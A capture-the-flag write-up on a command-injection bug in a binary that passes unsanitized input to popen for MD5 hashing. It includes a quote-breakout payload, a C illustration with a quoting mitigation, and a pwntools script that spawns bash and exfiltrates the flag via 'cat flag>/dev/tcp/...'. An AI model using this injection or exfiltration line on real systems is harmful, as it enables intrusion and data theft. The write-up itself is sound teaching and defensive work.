We're presented with a binary that, on the surface, takes our input, uses `popen` to compute its MD5 hash with `md5sum`, and checks whether the hash equals `3b9aafa12aceeccd29a154766194a964`.

Obviously, we don't want to try to find a preimage for that hash, but we do know that the binary reads our string and uses `sprintf` to splice it into the shell command line. Because the input is never sanitized, single quotes in the string we pass let us close the quoted argument and break out of the intended command.

If we provide the string `'&&/bin/sh'`, the command becomes `echo -n ''&&/bin/sh'' | md5sum`. Testing this locally and on the remote server, we appear to be able to run commands, but we can't see their output. Piping the contents of the file to netcat doesn't seem to work either.
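The root cause is the `sprintf`-into-`popen` pattern described above: user input is pasted into a shell command line, so a single quote in the input ends the quoted argument. The write-up doesn't show the binary's source, so the C below is an added illustration (not the challenge's code): `build_cmd_unsafe` is a hypothetical reconstruction of that pattern, and `build_cmd_quoted` shows the mitigation of quoting the input as a single shell word before splicing it in (every embedded `'` becomes `'\''`). Fed the write-up's `'&&/bin/sh'` input, the unsafe builder yields exactly the command line quoted above, while the quoted builder keeps the whole string inside one argument.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical reconstruction of the vulnerable pattern the write-up describes:
 * the raw input is dropped straight into a shell command line. Returns the
 * command length, or -1 if the output buffer is too small. */
int build_cmd_unsafe(const char *input, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "echo -n '%s' | md5sum", input);
    if (n < 0 || (size_t)n >= outlen) return -1;
    return n;
}

/* Quote an arbitrary string as a single POSIX shell word: wrap it in '...'
 * and rewrite each embedded ' as '\'' (close quote, escaped quote, reopen).
 * Returns bytes written (excluding the NUL), or -1 if out is too small. */
int shell_quote(const char *input, char *out, size_t outlen)
{
    size_t pos = 0;
    if (outlen < 2) return -1;            /* room for opening quote + NUL */
    out[pos++] = '\'';
    for (const char *p = input; *p; ++p) {
        if (*p == '\'') {
            if (pos + 4 >= outlen) return -1;
            memcpy(out + pos, "'\\''", 4); /* the 4-byte sequence '\'' */
            pos += 4;
        } else {
            if (pos + 1 >= outlen) return -1;
            out[pos++] = *p;
        }
    }
    if (pos + 1 >= outlen) return -1;     /* closing quote + NUL */
    out[pos++] = '\'';
    out[pos] = '\0';
    return (int)pos;
}

/* Hardened builder: the input is quoted as one shell word, so a stray single
 * quote can no longer terminate the argument and chain another command. */
int build_cmd_quoted(const char *input, char *out, size_t outlen)
{
    char quoted[512];
    if (shell_quote(input, quoted, sizeof quoted) < 0) return -1;
    int n = snprintf(out, outlen, "echo -n %s | md5sum", quoted);
    if (n < 0 || (size_t)n >= outlen) return -1;
    return n;
}

int main(void)
{
    /* Constructed sample input: the write-up's breakout string. */
    const char *input = "'&&/bin/sh'";
    char cmd[256];

    if (build_cmd_unsafe(input, cmd, sizeof cmd) > 0)
        printf("unsafe : %s\n", cmd);
    if (build_cmd_quoted(input, cmd, sizeof cmd) > 0)
        printf("quoted : %s\n", cmd);
    return 0;
}
```

Quoting is a mitigation, not the ideal fix: the robust approach is to avoid a shell entirely, either by hashing the data in-process or by running `md5sum` via `fork`/`exec` with an argv array and feeding the input over a pipe, so there is no command line for user data to land in.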

By switching to `/bin/bash` we can use bash's `/dev/tcp` pseudo-device to exfiltrate the flag.

We can easily complete the exploit by hand, but here's a script that does it anyway.

```
from pwn import *
import time

def main():
    # Local copy of the binary; swap in the remote() line for the challenge server.
    p = process('./main')
    # p = remote('54.225.38.91', 1025)

    # Close the single-quoted argument and chain a shell onto the popen() command.
    p.sendline(b"'&&/bin/bash'")

    # Listener that will receive the flag (e.g. a local `nc -l` on this port).
    remote_ip = "127.0.0.1"
    remote_port = "55555"

    # Need to slow down a bit: give the shell a moment to start before sending to it.
    time.sleep(2)
    p.sendline("cat flag>/dev/tcp/{}/{}".format(remote_ip, remote_port).encode())
    time.sleep(2)

    return 0

if __name__ == "__main__":
    exit(main())
```